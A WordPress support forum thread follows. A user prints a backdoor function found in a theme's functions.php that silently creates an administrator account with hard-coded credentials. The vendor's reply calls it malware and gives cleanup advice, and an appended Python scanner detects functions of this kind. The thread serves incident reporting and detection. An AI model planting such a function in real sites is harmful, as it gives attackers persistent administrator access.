Unauthorized user added to "wp-content/themes/travel-eye-pro/functions.php" file

  • #104555
    Ashley Moss
    Participant

    Hello,

    There is an unauthorized user being created in the Travel Eye Pro functions.php file.

    Below is the code:

    function wpb_admin_account(){
        $user = 'UsernamE';
        $pass = 'UsernamE';
        $email = 'email@domain.com';
        // if a username with the email ID does not exist, create a new user account
        if ( !username_exists( $user ) && !email_exists( $email ) ) {
            $user_id = wp_create_user( $user, $pass, $email );
            $user = new WP_User( $user_id );
            // Set the new user as an Admin
            $user->set_role( 'administrator' );
        }
    }

    What is happening here is that this function creates a user with the username UsernamE and the same password, and the email is email@domain.com. Now every time you delete this, this file will create this user again and give the admin role to the user.

    Can you please check if this code is a part of Travel Eye theme functions.php file or if you know the purpose of this code?

    Thank you!

    #104572
    wensolutions
    Keymaster

    Hello @lynaeash,

    The code is not in our core file. It must be a malware infection as you have mentioned.

    Malware infection could be injected in four ways:
    1 – using fake WordPress admin user credentials
    2 – via a vulnerable plugin(s) installed on your system
    3 – via previously installed malicious shell used to reinfect other
    4 – In the case of shared hosting or multiple sites on the same hosting account, the infection may come from other sites as well

    It is worthwhile to:
    1 – reset all WordPress passwords and review/remove all suspicious users
    2 – investigate your WordPress setup with other security plugins
    3 – investigate the website access log to locate what exactly was exploited on your side

    So please verify these steps.

    Thank you.
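
Added example, not part of the forum thread or the theme's code: a small Python scanner that flags PHP functions which both create a user and grant the administrator role, the pattern reported in the first post. The names `function_bodies` and `find_admin_backdoors` are hypothetical, and the brace matching is a heuristic that does not account for braces inside strings or comments.

```python
import re
import sys
from pathlib import Path

# Curly quotes appear when code is copied from a web page; normalise them first.
QUOTES = str.maketrans({"\u2018": "'", "\u2019": "'", "\u201c": '"', "\u201d": '"'})
CREATE = re.compile(r"\bwp_(?:create|insert)_user\s*\(")
ADMIN = re.compile(r"""set_role\s*\(\s*['"]administrator['"]|['"]role['"]\s*=>\s*['"]administrator['"]""")
FUNC = re.compile(r"\bfunction\s+(\w+)\s*\(")
ASSIGN = re.compile(r"""\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""")


def function_bodies(src):
    """Yield (name, start_line, body) for each named PHP function, by brace matching."""
    for m in FUNC.finditer(src):
        start = src.find("{", m.end())
        if start == -1:
            continue
        depth = 0
        for i in range(start, len(src)):
            depth += {"{": 1, "}": -1}.get(src[i], 0)
            if depth == 0:
                break
        yield m.group(1), src.count("\n", 0, m.start()) + 1, src[start:i + 1]


def find_admin_backdoors(src):
    """Return findings for functions that create a user AND grant administrator."""
    src = src.translate(QUOTES)
    findings = []
    for name, line, body in function_bodies(src):
        if CREATE.search(body) and ADMIN.search(body):
            # Hard-coded string literals (username, password, email) are useful IoCs.
            literals = {var: val for var, _, val in ASSIGN.findall(body)}
            findings.append({"function": name, "line": line, "hardcoded": literals})
    return findings


if __name__ == "__main__":
    # Usage: python scan.py wp-content/   (defaults to the current directory)
    for path in Path(sys.argv[1] if len(sys.argv) > 1 else ".").rglob("*.php"):
        for h in find_admin_backdoors(path.read_text(errors="replace")):
            print(f"{path}:{h['line']} {h['function']}() creates an administrator: {h['hardcoded']}")
```

A hit is a lead for manual review rather than proof of infection, since legitimate setup code can also create administrators.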
